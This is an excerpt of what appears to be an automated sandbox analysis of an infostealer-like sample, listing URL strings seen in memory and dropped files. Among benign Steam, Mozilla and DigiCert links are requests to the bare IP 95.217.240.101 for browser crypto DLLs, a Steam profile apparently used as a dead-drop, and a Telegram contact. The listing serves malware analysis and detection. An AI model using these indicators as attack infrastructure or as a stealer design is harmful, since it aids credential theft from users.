                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0N
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://store.st
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                  Source: RegAsm.exe, 00000002.00000002.2647482481.000000001B6CD000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                  Source: 76561199686524322[1].htm.2.drString found in binary or memory: https://95.217.240.101
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/D
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/O
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/freebl3.dll
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/freebl3.dllwT=
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/mozglue.dll
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/msvcp140.dllsS9
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/msvcp140.dllyS#
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/nss3.dll
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/softokn3.dll
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/softokn3.dlleS
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/sqlx.dll
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/sqlx.dllI
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/vcruntime140.dll
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101IDH
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101KEG
                  Source: HIEBAK.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: 76561199686524322[1].htm.2.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                  Source: HIEBAK.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: HIEBAK.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: HIEBAK.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGAFt&a
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=soQOTmUz
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=6MtR
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=L3Ed_Gybseku&l=e
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                  Source: 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                  Source: HIEBAK.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: HIEBAK.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: HIEBAK.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://help.steampowered.com/en/
                  Source: GCGDGH.2.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: https://mozilla.org0/
                  Source: 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/discussions/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                  Source: 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199686524322
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/market/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                  Source: file.exe, 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2641871501.0000000000EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199686524322
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199686524322/badges
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199686524322/inventory/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/tIP
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/workshop/
                  Source: 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/
                  Source: 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/about/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/explore/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/legal/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/mobile
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/news/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/points/shop/
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/stats/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: KJKJJJ.2.drString found in binary or memory: https://support.mozilla.org
                  Source: KJKJJJ.2.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: KJKJJJ.2.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                  Source: file.exe, 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/k0mono
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: HIEBAK.2.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: HIEBAK.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: KJKJJJ.2.drString found in binary or memory: https://www.mozilla.org
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
